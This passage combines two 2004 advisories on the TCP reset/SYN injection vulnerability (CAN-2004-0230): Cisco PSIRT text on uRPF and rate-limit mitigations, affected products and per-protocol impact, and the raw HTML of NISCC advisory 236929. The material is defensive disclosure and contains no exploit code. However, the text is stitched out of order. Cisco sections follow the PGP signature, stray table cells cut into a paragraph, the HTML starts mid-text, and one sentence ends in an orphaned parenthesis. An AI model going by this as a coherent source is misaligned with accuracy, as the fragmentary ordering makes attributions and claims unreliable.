network. Infrastructure access control lists\n    (ACLs) are considered a network security best practice and should be\n    considered as a long-term addition to good network security as well\n    as a workaround for this specific vulnerability. The white paper\n    entitled \"Protecting Your Core: Infrastructure Protection Access\n    Control Lists\", available at http://www.cisco.com/warp/public/707/\n    iacl.html, presents guidelines and recommended deployment techniques\n    for infrastructure protection ACLs. Exceptions would include any\n    devices which have a legitimate reason to access your infrastructure\n    (for example, BGP peers, NTP sources, DNS serves, and so on). All\n    other traffic must be able to traverse your network without\n    terminating on any of your devices. \n   \n   \n  * Configure anti-spoofing measures on the network edge\n    In order for an adversary to use the attack vector described in this\n    advisory, it must send packets with the source IP address equal to\n    one of the BGP peers. You can block spoofed packets either using the\n    Unicast Reverse Path Forwarding (uRPF) feature or by using access\n    control lists (ACLs). \n    By enabling uRPF, all spoofed packets will be dropped at the first\n    device. To enable uRPF, use the following commands:\n        router(config)#ip cef \n        \n        router(config)#ip verify unicast reverse-path\n       \n    Please consult http://www.cisco.com/en/US/products/sw/iosswrel/ps1835\n    /products_configuration_guide_chapter09186a00800ca7d4.html and ftp://\n    ftp-eng.cisco.com/cons/isp/security/URPF-ISP.pdf for further details\n    on how uRPF works and how to configure it in various scenarios. This\n    is especially important if you are using asymmetric routing. \n    ACLs should also be deployed as close to the edge as possible. Unlike\n    uRPF, you must specify the exact IP range that is permitted. \n    Specifying which addresses should be blocked is not the optimal\n    solution because it tends to be harder to maintain. \n   \n    Caution: In order for anti-spoofing measures to be effective,\n    they must be deployed at least one hop away from the devices which\n    are being protected. Ideally, they will be deployed at the network\n    edge facing your customers. \n   \n  * Packet rate limiting RST packets are rate-limited in Cisco IOS\n    software by default. This feature is introduced in Cisco IOS Software\n    Release 10.2. In the case of a storm of RST packets, they are\n    effectively limited to one packet per second. In order to be\n    successful, an attacker must terminate connection with the first few\n    packets. Otherwise, the attack is deemed to be impracticably long. On\n    the other hand, SYN packets are not rate-limited in any way. \n    Rate limiting can be accomplished either by using Committed Access\n    Rate (CAR) or by Control Plane Policing (CPP). While CPP is the\n    recommended approach, it is available only for Cisco IOS Software\n    Releases 12.2(18)S and 12.3(4)T. It is currently supported only on\n    the following routers: 1751, 2600/2600-XM, 3700, 7200, and 7500\n    Series. \n\n    CAR can be configured as follows:\n\n        router(config)#access-list 103 deny tcp any host 10.1.1.1 established\n        \n        router(config)#access-list 103 permit tcp any host 10.0.0.1\n        \n        router(config)#interface \u003cinterface\u003e \u003cinterface #\u003e\n        \n        router(config-if)#rate-limit input access-group 103 8000 8000 8000 \n            conform-action transmit exceed-action drop\n       \n    For details on how to configure and deploy CPP, please consult the\n    following document http://www.cisco.com/en/US/products/sw/iosswrel/\n    ps1838/products_white_paper09186a0080211f39.shtml\n   \n\nExploitation and Public Announcements\n=====================================\nThe Cisco PSIRT is not aware of any public announcements or malicious use\nof the vulnerability described in this advisory. \n\nThe exploitation of the vulnerability with packets having RST flag set\n(reset packets) was discovered by Paul (Tony) Watson of OSVDB.org. The\nextension of the attack vector to packets with SYN flag was discovered by\nthe vendors cooperating on the resolution of this issue. \n\nStatus of This Notice: INTERIM\n==============================\nThis is a INTERIM advisory. Although Cisco cannot guarantee the accuracy of\nall statements in this advisory, all of the facts have been checked to\nthe best of our ability. Cisco does not anticipate issuing updated\nversions of this advisory unless there is some material change in the\nfacts. Should there be a significant change in the facts, Cisco may\nupdate this advisory. \n\nA stand-alone copy or Paraphrase of the text of this Security Advisory\nthat omits the distribution URL in the following section is an\nuncontrolled copy, and may lack important information or contain factual\nerrors. \n\nDistribution\n============\nThis advisory will be posted on Cisco\u0027s worldwide website at \nhttp://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-ios.shtml. \n\nIn addition to worldwide web posting, a text version of this notice is\nclear-signed with the Cisco PSIRT PGP key and is posted to the following\ne-mail and Usenet news recipients. \n   \n   \n  * cust-security-announce@cisco.com\n   \n  * first-teams@first.org (includes CERT/CC)\n \n  * bugtraq@securityfocus.com\n  \n  * vulnwatch@wulnwatch.org\n   \n  * cisco@spot.colorado.edu\n   \n  * cisco-nsp@puck.nether.net\n   \n  * full-disclosure@lists.netsys.com\n  \n  * comp.dcom.sys.cisco@newsgate.cisco.com\n   \n\nFuture updates of this advisory, if any, will be placed on Cisco\u0027s\nworldwide website, but may or may not be actively announced on mailing\nlists or newsgroups. Users concerned about this problem are encouraged to\ncheck the above URL for any updates. \n\nRevision History\n================\n+----------+-------------+----------------+\n| Revision | 2004-Apr-20 | Initial public |\n| 1.0      |             | release.       |\n+----------+-------------+----------------+\n\nCisco Security Procedures\n=========================\nComplete information on reporting security vulnerabilities in Cisco\nproducts, obtaining assistance with security incidents, and registering\nto receive security information from Cisco, is available on Cisco\u0027s\nworldwide website at http://www.cisco.com/warp/public/707/\nsec_incident_response.shtml. This includes instructions for press\ninquiries regarding Cisco Security Notices. All Cisco Security Advisories\nare available at http://www.cisco.com/go/psirt. \n\n- -------------------------------------------------------------------------\n\nAll contents are Copyright \\xa9 1992-2004 Cisco Systems, Inc. All rights\nreserved. Important Notices and Privacy Statement. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.2.3 (Cygwin)\n\niD8DBQFAhZTpezGozzK2tZARAkKXAJ9BWwuytT7zwoOL+RkZJPebYN3W3ACfV/+K\n0Fd3MvvRlKSETCrlMGL/dZg=\n=eDSn\n-----END PGP SIGNATURE-----\n. \n\nThe nonexhaustive list of vulnerable non-IOS based Cisco products is as\nfollows:\n   \n  * Access Registrar\n\n  * BPX, IGX, MGX WAN switches, and the Service Expansion Shelf\n\n  * BR340, WGB340, AP340, AP350, BR350 Cisco/Aironet wireless products\n\n  * Cache Engine 505 and 570\n\n  * CallManager\n\n  * Catalyst 1200, 1900, 28xx, 29xx, 3000, 3900, 4000, 5000, 6000\n\n  * Cisco 8110 Broadband Network Termination Unit\n\n  * Cisco Element Management Framework\n\n  * Cisco Info Center\n\n  * Cisco Intelligent Contact Management\n\n  * Cisco MDS 9000\n\n  * Cisco ONS 15190/15194 IP Transport Concentrator\n\n  * Cisco ONS 15327 Metro Edge Optical Transport Platform\n\n  * Cisco ONS 15454 Optical Transport Platform\n\n  * Cisco ONS 15531/15532 T31 OMDS Metro WDM System\n\n  * Cisco ONS 15800/15801/15808 Dense Wave Division Multiplexing Platform\n\n  * Cisco ONS 15830 T30 Optical Amplification System\n\n  * Cisco ONS 15831/15832 T31 DWDM System\n\n  * Cisco ONS 15863 T31 Submarine WDM System\n\n  * Content Router 4430 and Content Delivery Manager 4630 and 4650\n\n  * Cisco Secure Intrusion Detection System (NetRanger) appliance and IDS\n    Module\n\n  * Cisco Secure PIX firewall\n\n  * Cisco ws-x6608 and ws-x6624 IP Telephony Modules\n\n  * CiscoWorks Windows\n\n  * Content Engine 507, 560, 590, and 7320\n\n  * CSS11000 (Arrowpoint) Content Services Switch\n\n  * Hosting Solution Engine\n\n  * User Registration Tool VLAN Policy Server\n\n  * Cisco FastHub 300 and 400\n\n  * CR-4430-B\n\n  * Device Fault Manager\n\n  * Internet CDN Content Engine 590 and 7320, Content Distribution\n    Manager 4670, and Content Router 4450\n\n  * IP Phone (all models including ATA and VG248)\n\n  * IP/TV\n\n  * LightStream 1010\n\n  * LightStream 100 ATM Switches\n\n  * LocalDirector\n\n  * ME1100 series\n\n  * MicroHub 1500,MicroSwitch 1538/1548\n\n  * Voice Manager\n\n  * RTM\n\n  * SN5400 series storage routers\n\n  * Switch Probe\n\n  * Unity Server\n\n  * VG248 Analog Phone Gateway\n\n  * Traffic Director\n\n  * WAN Manager   \n   \n\nProducts Confirmed Not Vulnerable\n=================================\nThe following products are not vulnerable:\n   \n   \n  * Cisco VPN 3000 Series Concentrators\n   \n  * Cisco Firewall Services Module for Cisco Catalyst 6500 Series and\n    Cisco 7600 Series (FWSM)\n   \n\nDetails\n======\nTCP is the transport layer protocol designed to provide\nconnection-oriented reliable delivery of a data stream. The Cisco PSIRT\nhas analyzed multiple TCP-based protocols, as they are used within our\noffering, and we believe that this vulnerability does not have a\nsignificant impact on them. We will present our analysis for a few\nprotocols which have the potential for higher impact due to the long\nlived connections. \n\nVoice signaling H.225, H.245 (part of H.323 suite)\n- --------------------------------------------------\nH.225 and H.245 protocols are used in voice signaling. Their purpose is\nto negotiate parameters for content transfer (voice or video). The\nestablished sessions persist for the duration of a call. Any call in\nprogress is terminated when the signaling session is broken. A new\nsignaling session will be established immediately for the new call, but\nterminated calls cannot be re-established. \n\nEach call from an IP telephone or softphone will result in the creation\nof a single signaling session. It is possible that a single signaling session is\nresponsible for multiple calls, but that setup is used deeper within the\nService Provider\u0027s network. Determining all necessary parameters for\nmounting an attack is deemed a non-trivial task if the network is\ndesigned according to the current best practices. \n\nNetwork Storage (iSCSI, FCIP)\n- -----------------------------\nNetwork Storage products use two TCP-based protocols: SCSI over IP\n(iSCSI) and Fiber Channel over IP (FCIP). \n   \n   \n  * SCSI over IP (iSCSI)\n   \n    iSCSI is used in a client/server environment. The client is your\n    computer and it is only the client that initiates a connection. This\n    connection is not shared with any other users. Terminating the session\n    will not have any adverse consequences if people are using current\n    drivers from Microsoft for Windows and from Cisco for Linux. These\n    drivers will re-establish the session and continue transfer from the\n    point where it was disconnected. Drivers from other vendors may\n    behave differently. \n   \n    The user may notice that access to a virtual device is slightly\n    slower than usual. \n   \n   \n  * Fiber Channel over IP (FCIP)\n   \n    FCIP is a peer-to-peer protocol. It is used for mirroring data\n    between switches. Each peer can initiate the session. Switches can,\n    and should be in practice, configured in a mesh. Bringing one link\n    down will cause traffic to be re-routed over other link(s). If an\n    adversary can manage to terminate the session multiple times in a\n    row, the user\u0027s application may terminate with a \"Device unreachable\"\n    or similar error message. This does not have any influence on the\n    switch itself and the user can retry the operation. \n   \n    The user may notice that access to a virtual device is slightly\n    slower than usual. An occasional error message is possible. SSL/TLS connections can be used to encapsulate\nvarious kinds of traffic and these sessions can be long lived. An\nencrypted session can be attacked either on the originating or\nterminating host or on the firewalls in front of them (if they exist).         |\n|                |            | Customers    |\n|                |            | are          |\n|                |            | encouraged   |\n|                |            | to migrate   |\n|                |            | to IOS. \u003chtml\u003e\n\n\u003chead\u003e\n\u003cmeta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1252\"\u003e\n\n\u003ctitle\u003eNISCC Vulnerability Advisory 236929\u003c/title\u003e\n\u003cstyle\u003e\n\u003c!--\nbody         { font-family: Verdana }\n--\u003e\n\u003c/style\u003e\n\u003c/head\u003e\n\n\u003cbody bgcolor=\"#FFFFCC\"\u003e\n\u003cdiv class=Section1 style=\"width: 100%;\"\u003e \n\u003cdiv align=\"center\"\u003e\u003cimg src=\"http://www.niscc.gov.uk/images/newtitle.gif\" width=\"766\" height=\"80\" alt=\"National Infrastructure Security Co-Ordination Centre\"\u003e\u003c/div\u003e\n\u003cbr\u003e\n\u003cfont size=\"4\"\u003e\u003cb\u003e\u003cfont color=\"#FF0000\"\u003eNISCC Vulnerability Advisory 236929\u003c/b\u003e\u003c/font\u003e\u003cbr\u003e\n\u003cbr\u003e\n\u003cb\u003eVulnerability Issues in TCP\u003c/b\u003e\u003c/font\u003e\u003cbr\u003e\n\u003cbr\u003e\n\u003cbr\u003e\n\n\u003cb\u003e\u003cfont size=\"3\"\u003eVersion\u003c/font\u003e Information\u003c/b\u003e\n\u003cbr\u003e\u003cbr\u003e\n\u003ctable border=\"1\" width=\"61%\"\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"58%\"\u003eAdvisory Reference\u003c/td\u003e\n    \u003ctd width=\"77%\"\u003e236929\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"58%\"\u003eRelease Date\u003c/td\u003e\n    \u003ctd width=\"77%\"\u003e20 April 2004\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"58%\"\u003eLast Revision\u003c/td\u003e\n    \u003ctd width=\"77%\"\u003e22 April 2004\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"58%\"\u003eVersion Number\u003c/td\u003e\n    \u003ctd width=\"77%\"\u003e1.4\u003c/td\u003e\n  \u003c/tr\u003e\n\u003c/table\u003e\n\u0026nbsp;\u003cbr\u003e\u003cbr\u003e\n\u003cb\u003eWhat is Affected?\u003c/b\u003e\u003cbr\u003e\n\u003cbr\u003e\nThe vulnerability described in this advisory affects implementations of the \nTransmission Control Protocol (TCP) that comply with the Internet Engineering \nTask Force\\x92s (IETF\\x92s) Requests For Comments (RFCs) for TCP, including \n\u003ca href=\"http://www.ietf.org/rfc/rfc0793.txt\"\u003eRFC 793\u003c/a\u003e, the \noriginal specification, and \u003ca href=\"http://www.ietf.org/rfc/rfc1323.txt\"\u003eRFC 1323\u003c/a\u003e, TCP Extensions for High Performance.\u003cbr\u003e\n\u003cbr\u003e\nTCP is a \ncore network protocol used in the majority of networked computer systems today. \nMany vendors include support for this protocol in their products and may be \nimpacted to varying degrees. \n\u003cbr\u003e\n\u003cbr\u003e\n\u003cbr\u003e\n\u003cb\u003eSeverity\u003c/b\u003e\u003cbr\u003e\n\u003cbr\u003e\nThe impact of this vulnerability varies by vendor and application, but in some \ndeployment scenarios it is rated critical. Alternatively contact your vendor for product specific \ninformation.\u003cbr\u003e\n\u003cbr\u003e\nIf exploited, the vulnerability could allow an attacker to create a \nDenial of Service condition against existing TCP connections, resulting in \npremature session termination. The resulting session termination will affect the \napplication layer, the nature and severity of the effects being dependent on the \napplication layer protocol. The primary dependency is on the duration of the TCP \nconnection, with a further dependency on knowledge of the network (IP) addresses \nof the end points of the TCP connection.\u003cbr\u003e\n\u003cbr\u003e\nThe Border Gateway Protocol (BGP) is judged to be potentially most affected \nby this vulnerability.\u003cbr\u003e\n\u003cbr\u003e\nBGP relies on a persistent TCP session between BGP peers. Resetting the \nconnection can result in medium term unavailability due to the need to rebuild \nrouting tables and route flapping.\u0026nbsp; Route flapping may result in route dampening \n(suppression) if the route flaps occur frequently within a short time interval.\u0026nbsp; The overall impact on BGP is likely to be moderate based on \nthe likelihood of successful attack. If the TCP MD5 Signature Option and \nanti-spoofing measures are used \nthen the impact will be low as these measures will successfully mitigate the \nvulnerability.\u003cbr\u003e\n\u003cbr\u003e\nThere is a potential impact on other application protocols such as DNS (Domain \nName System) and SSL (Secure Sockets Layer) in the case of zone transfers and \necommerce transactions respectively, but the duration of the sessions is \nrelatively short and the sessions can be restarted without medium term \nunavailability problems. In the case of SSL it may be difficult to guess the \nsource IP address.\u003cbr\u003e\n\u003cbr\u003e\nData injection may be possible. However, this has not been demonstrated and \nappears to be problematic. The reason \nfor this is that the receiving TCP implementation checks the sequence number of \nthe RST or SYN packet, which is a 32 bit number, giving a probability of 1/2\u003csup\u003e\u003cfont size=\"2\"\u003e32\u003c/font\u003e\u003c/sup\u003e of \nguessing the sequence number correctly (assuming a random distribution).\u003cbr\u003e\n\u003cbr\u003e\nThe discoverer of the practicability of the RST attack was Paul A. Watson, who \ndescribes his research in his paper \\x93Slipping In The Window: TCP Reset Attacks\\x94, \npresented at the CanSecWest 2004 conference. In a RST/ACK packet an acknowledgement number is included \nin the packet, although it is not checked by the receiving TCP implementation.)\u003cbr\u003e\n\u003cbr\u003e\n\u003ca href=\"http://www.ietf.org/rfc/rfc0793.txt\"\u003eRFC 793\u003c/a\u003e, p36, states the following:\u003cbr\u003e\n\u003cbr\u003e\n\u0026quot;In all states except SYN-SENT, all reset (RST) segments are validated by \nchecking their SEQ-fields [sequence numbers]. In the SYN-SENT state (a RST received in response to an \ninitial SYN), the RST is acceptable if the ACK field acknowledges the SYN.\u0026quot;\u003cbr\u003e\n\u003cbr\u003e\nResets must be processed immediately. \n\u003ca href=\"http://www.ietf.org/rfc/rfc0793.txt\"\u003eRFC 793\u003c/a\u003e, p25, says \u0026quot;[\\x85] [E]ven when the \nreceive window is zero, a TCP must process the RST and URG fields of all \nincoming segments.\u0026quot;\u003cbr\u003e\n\u003cbr\u003e\nIt is also possible to perform the same attack with SYN (synchronise) packets. \n\u003ca href=\"http://www.ietf.org/rfc/rfc0793.txt\"\u003eRFC 793\u003c/a\u003e, p31 \nstates:\u003cbr\u003e\n\u003cbr\u003e\n\\x93The principle reason for the three-way handshake is to prevent old duplicate \nconnection initiations from causing confusion. To deal with this, a special \ncontrol message, reset, has been devised. [\\x85] If the TCP is in one of the \nsynchronized states (ESTABLISHED, FIN-WAIT-1, FIN-WAIT-2, CLOSE-WAIT, CLOSING, \nLAST-ACK, TIME-WAIT), it aborts the connection and informs its user.\\x94\u003cbr\u003e\n\u003cbr\u003e\nTCP window sizes are negotiated in the initial 3-way handshake used to set up a \nTCP connection, with higher values serving to improve throughput in some \ncircumstances. Vendor-chosen defaults also influence the selection. An attacker seeking to disrupt an \nexisting TCP connection must supply the 4-tuple correctly. As the source port \nvaries, additional work is generally called for on the part of the attacker. \nHowever, research (referenced below) has shown that the process of source port \nselection on many platforms includes predictable elements, so that the attack \nremains practicable. By weighting \u0027likely\u0027 source port values carefully, an \nattacker can disrupt TCP implementations that employ a range of window sizes.\u003cbr\u003e\n\u003cbr\u003e\nApplication layer protocols that are critically affected are those that:\u003cbr\u003e\n\u003cbr\u003e\n\u003ctable border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"border-collapse: collapse\" bordercolor=\"#111111\" width=\"100%\" id=\"AutoNumber6\"\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\" align=\"left\" valign=\"top\"\u003e\\x95 \u003c/td\u003e\n    \u003ctd width=\"96%\"\u003eDepend on long lived TCP connections\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\" align=\"left\" valign=\"top\"\u003e\\x95 \u003c/td\u003e\n    \u003ctd width=\"96%\"\u003eHave known or easy-to-guess IP address end points\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\" align=\"left\" valign=\"top\"\u003e\\x95 \u003c/td\u003e\n    \u003ctd width=\"96%\"\u003eHave easy to an easy-to-guess source TCP port\u003c/td\u003e\n  \u003c/tr\u003e\n\u003c/table\u003e\n\u003cp\u003eAs noted above BGP does use long lived TCP connections, and the IP addresses and \nsource port (and destination port) are sometimes available through the use of \nBGP looking glasses (multi-source, multi-destination trace route tools) or DNS \nresource records. Using \\x93trace route\\x94 commands can provide information on \npeering point IP addresses. Thus BGP is likely to be critically affected by the \nTCP vulnerability.\u003cbr\u003e\n\u003cbr\u003e\nThese denial of service attacks can be carried out by single machine, or by \nmultiple co-operating systems (to form a distributed denial of service attack).\u003cbr\u003e\n\u003cbr\u003e\nIt is also possible to inject packets, which will be processed if they are in \nthe window. The difficulty with data injection attacks is that the receiving TCP \nimplementation will reassemble the packets received according to sequence \nnumber, dropping any duplicate packets.\u003cbr\u003e\n\u003cbr\u003e\n\u003cbr\u003e\nVendor specific information will be released as it becomes available and if vendor permission has been received.  Subscribers are advised to check the following URL regularly for updates:\u003cbr\u003e\n\u003cbr\u003e\n\u003ca href=\"http://www.uniras.gov.uk/vuls/2004/236929/index.htm\"\u003ehttp://www.uniras.gov.uk/vuls/2004/236929/index.htm\u003c/a\u003e\u003cbr\u003e\n\u003cbr\u003e\n\u003ci\u003e[Please note that updates to this advisory will not be notified by email.]\u003c/i\u003e\u003cbr\u003e\n\u003cbr\u003e\nThis vulnerability has been assigned the \u003ca href=\"http://cve.mitre.org/cve\"\u003eCVE\u003c/a\u003e \nname \n\u003ca href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0230\"\u003eCAN-2004-0230\u003c/a\u003e.\u003cbr\u003e\n\u003cbr\u003e\nThe \u003ca href=\"http://www.osvdb.org\"\u003eOpen Source Vulnerability Database\u003c/a\u003e ID \nnumber for this vulnerability is\n\u003ca href=\"http://www.osvdb.org/displayvuln.php?osvdb_id=4030\"\u003e4030\u003c/a\u003e.\u003cbr\u003e\n\u003cbr\u003e\n\u003cbr\u003e\n\u003cb\u003eMitigation\u003c/b\u003e\u003cbr\u003e\n\u003cbr\u003e\nThe following mitigation steps are still being evaluated and may be incomplete. \nCustomers should work with vendors for the workaround most appropriate for the \nproduct in question.\u003cbr\u003e\n\u003cbr\u003e\nIn the absence of vendor patching of the TCP implementation, the following are \ngeneral mitigating steps:\u003cbr\u003e\n\u003cbr\u003e\n\u003ctable border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"border-collapse: collapse\" bordercolor=\"#111111\" width=\"100%\" id=\"AutoNumber4\"\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\" align=\"left\" valign=\"top\"\u003e\\x95 \u003c/td\u003e\n    \u003ctd width=\"97%\"\u003eImplement IP Security (IPSEC) which will encrypt traffic at the network layer, \nso TCP information will not be visible\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\" align=\"left\" valign=\"top\"\u003e\\x95 \u003c/td\u003e\n    \u003ctd width=\"97%\"\u003eReduce the TCP window size (although this could increase \n    traffic loss and subsequent retransmission)\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\" align=\"left\" valign=\"top\"\u003e\\x95 \u003c/td\u003e\n    \u003ctd width=\"97%\"\u003eDo not publish TCP source port information\u003c/td\u003e\n  \u003c/tr\u003e\n\u003c/table\u003e\n\u003cp\u003eIt should be noted that IPSEC provides confidentiality and authentication \nservices at the network layer, and can provide a measure of trust in the \nauthenticity of the end points as well as encryption of traffic between the end \npoints.\u0026nbsp; However, in the context of the current attack IPSEC will reject \nRST and SYN packets that are not part of a secure IP packet stream.\u003cbr\u003e\n\u003cbr\u003e\nTo change the TCP window size, in some Unix variants you can set a value of the \ndefault TCP windows size by using the \\x93sysctl\\x94 program (\\x93ndd -set\\x94 in the case \nof Sun Solaris). In the case of Microsoft Windows NT/2000/XP/2003, the default \nwindow size can be changed by modifying the value of the HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters \nkey. As noted above, great care should be exercised when altering the default \nTCP window size as network performance could be adversely affected.\u003cbr\u003e\n\u003cbr\u003e\nIn the case of BGP, the following may counter the problem:\u003cbr\u003e\n\u003cbr\u003e\n\u003ctable border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"border-collapse: collapse\" bordercolor=\"#111111\" width=\"100%\" id=\"AutoNumber5\"\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\" align=\"left\" valign=\"top\"\u003e\\x95 \u003c/td\u003e\n    \u003ctd width=\"96%\"\u003eImplement ingress and egress filtering to check that the \n    traffic entering or leaving the network has a source IP address that is \n    expected on the router/firewall interface that receives the traffic\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\" align=\"left\" valign=\"top\"\u003e\\x95 \u003c/td\u003e\n    \u003ctd width=\"96%\"\u003eImplement the TCP MD5 Signature Option to checksum the TCP \n    packet carrying the BGP application data (see \u003ca href=\"http://www.ietf.org/rfc/rfc2385.txt\"\u003eRFC 2385\u003c/a\u003e), \nbeing careful to set and maintain strong (i.e. difficult to guess) passwords to \nwhich the MD5 checksum is applied.\u0026nbsp; Also see\n    \u003ca href=\"http://www.ietf.org/rfc/rfc3562.txt\"\u003eRFC 3562\u003c/a\u003e which discusses \n    the security requirements of this keying material.\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\" align=\"left\" valign=\"top\"\u003e\\x95 \u003c/td\u003e\n    \u003ctd width=\"96%\"\u003eLimit the amount of information available through looking \n    glasses and DNS resource records, being careful not to expose TCP port \n    information unnecessarily\u003c/td\u003e\n  \u003c/tr\u003e\n\u003c/table\u003e\n\u003cp\u003e\nThe IETF ingress filtering standard is defined in \n\u003ca href=\"http://www.ietf.org/rfc/rfc2827.txt\"\u003eRFC 2827\u003c/a\u003e. \nA discussion of egress filtering can be found at \n\u003ca href=\"http://www.sans.org/y2k/egress.htm\"\u003ehttp://www.sans.org/y2k/egress.htm\u003c/a\u003e.\u003cbr\u003e\n\u003cbr\u003e\nThe use of the TCP MD5 Signature Option will prevent the exploitation of this \nvulnerability. Router customers should implement this on all BGP peering points \nif it is supported by the router, upgrading the router firmware if necessary.\u003cbr\u003e\n\u003cbr\u003e\n\u003cbr\u003e\n\u003cb\u003eSolution\u003c/b\u003e\u003cbr\u003e\n\u003cbr\u003e\nPlease refer to the Vendor Information section of this advisory for \nimplementation specific remediation.\u003cbr\u003e\n\u003cbr\u003e\nSome vendors will have reduced the \nlikelihood of successful denial of service by amending the TCP implementation to \nissue a further acknowledgment packet challenge for RST and SYN packets that do \nnot have exactly the expected sequence number.\u003cbr\u003e\n\u003cbr\u003e\n\u003ca href=\"http://www.ietf.org\"\u003eThe Internet Engineering Task Force\u003c/a\u003e (IETF) has \npublished an Internet Draft to co-incide \nwith the release of this advisory.\u0026nbsp;\nThe text of this draft is available from \nthe IETF web site:\u003cbr\u003e\n\u003ca href=\"http://www.ietf.org/internet-drafts/draft-ietf-tcpm-tcpsecure-00.txt\"\u003ehttp://www.ietf.org/internet-drafts/draft-ietf-tcpm-tcpsecure-00.txt\u003c/a\u003e\u003cbr\u003e\n\u003cbr\u003e\nNISCC has produced best practice guidelines for BGP available at\u003cbr\u003e\n\u003ca href=\"http://www.niscc.gov.uk/BGP%20Filtering%20Guide.pdf\"\u003ehttp://www.niscc.gov.uk/BGP Filtering Guide.pdf\u003c/a\u003e\u003cbr\u003e\n\u003cbr\u003e\nSecure configuration templates for BGP implementations on Cisco IOS and Juniper JUNOS can be found at:\u003cbr\u003e\n\u003cbr\u003e\n\u003ctable border=\"0\" cellpadding=\"4\" cellspacing=\"1\" style=\"border-collapse: collapse\" bordercolor=\"#111111\" width=\"100%\" id=\"AutoNumber2\"\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\"\u003e\\x95 \u003c/td\u003e\n    \u003ctd width=\"11%\"\u003eCisco\n    \u003c/td\u003e\n    \u003ctd width=\"99%\"\u003e\u003ca href=\"http://www.cymru.com/Documents/secure-bgp-template.html\"\u003ehttp://www.cymru.com/Documents/secure-bgp-template.html\n\u003c/a\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\"\u003e\\x95 \u003c/td\u003e\n    \u003ctd width=\"11%\"\u003eJuniper \u003c/td\u003e\n    \u003ctd width=\"99%\"\u003e\n\u003ca href=\"http://www.qorbit.net/documents/junos-bgp-template.pdf\"\u003ehttp://www.qorbit.net/documents/junos-bgp-template.pdf\n\u003c/a\u003e\n    \u003c/td\u003e\n  \u003c/tr\u003e\n\u003c/table\u003e\n\u003cp\u003e\nGuidance on tuning of the IP stack for a number of different UNIX operating systems is available at \n\u003ca href=\"http://www.cymru.com/Documents/ip-stack-tuning.html\"\u003ehttp://www.cymru.com/Documents/ip-stack-tuning.html\n\u003c/a\u003e\n\u003cbr\u003e\n\u003cbr\u003e\n\u003cbr\u003e\n\n\u003cB\u003eVendor Information\u003c/B\u003e\n\u003cbr\u003e\n\u003cbr\u003e\nThe following vendors have provided information about how their products are affected\nby these vulnerabilities.\u003cbr\u003e\n\u003cbr\u003e\n\u003ci\u003e\u003cfont size=\"2\"\u003ePlease note that \u003ca href=\"http://www.jpcert.or.jp\"\u003eJPCERT/CC\u003c/a\u003e have released a Japanese language advisory for this vulnerability\n which contains additional information regarding Japanese vendors.  This advisory is available at\n \u003ca href=\"http://www.jpcert.or.jp/at/2004/at040003.txt\"\u003ehttp://www.jpcert.or.jp/at/2004/at040003.txt\u003c/a\u003e.\u003c/font\u003e\u003c/i\u003e\u003cbr\u003e\n\u003cbr\u003e\n\u003c/p\u003e\n\u003c/p\u003e\n\u003c/p\u003e\n\u003ctable border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse\" bordercolor=\"#111111\" width=\"100%\" id=\"AutoNumber1\"\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"33%\"\u003e\u003cfont size=\"2\"\u003e\u003ca href=\"#certicom\"\u003eCerticom\u003c/a\u003e\u003c/font\u003e\u003c/td\u003e\n    \u003ctd width=\"33%\"\u003e\u003cfont size=\"2\"\u003e\u003ca href=\"#iij\"\u003eInternet Initiative Japan, Inc\u003c/a\u003e\u003c/font\u003e\u003c/td\u003e\n    \u003ctd width=\"34%\"\u003e\u003cfont size=\"2\"\u003e\u003ca href=\"#nec\"\u003eNEC\u003c/a\u003e\u003c/font\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"33%\"\u003e\u003cfont size=\"2\"\u003e\u003ca href=\"#checkpoint\"\u003eCheck Point\u003c/a\u003e\u003c/font\u003e\u003c/td\u003e\n    \u003ctd width=\"33%\"\u003e\u003cfont size=\"2\"\u003e\u003ca href=\"#interniche\"\u003eInterNiche\u003c/a\u003e\u003c/font\u003e\u003c/td\u003e\n    \u003ctd width=\"34%\"\u003e\u003cfont size=\"2\"\u003e\u003ca href=\"#nortel\"\u003eNortel\u003c/a\u003e\u003c/font\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"33%\"\u003e\u003cfont size=\"2\"\u003e\u003ca href=\"#cisco\"\u003eCisco\u003c/a\u003e\u003c/font\u003e\u003c/td\u003e\n    \u003ctd width=\"33%\"\u003e\u003cfont size=\"2\"\u003e\u003ca href=\"#juniper\"\u003eJuniper Networks\u003c/a\u003e\u003c/font\u003e\u003c/td\u003e\n    \u003ctd width=\"34%\"\u003e\u003cfont size=\"2\"\u003e\u003ca 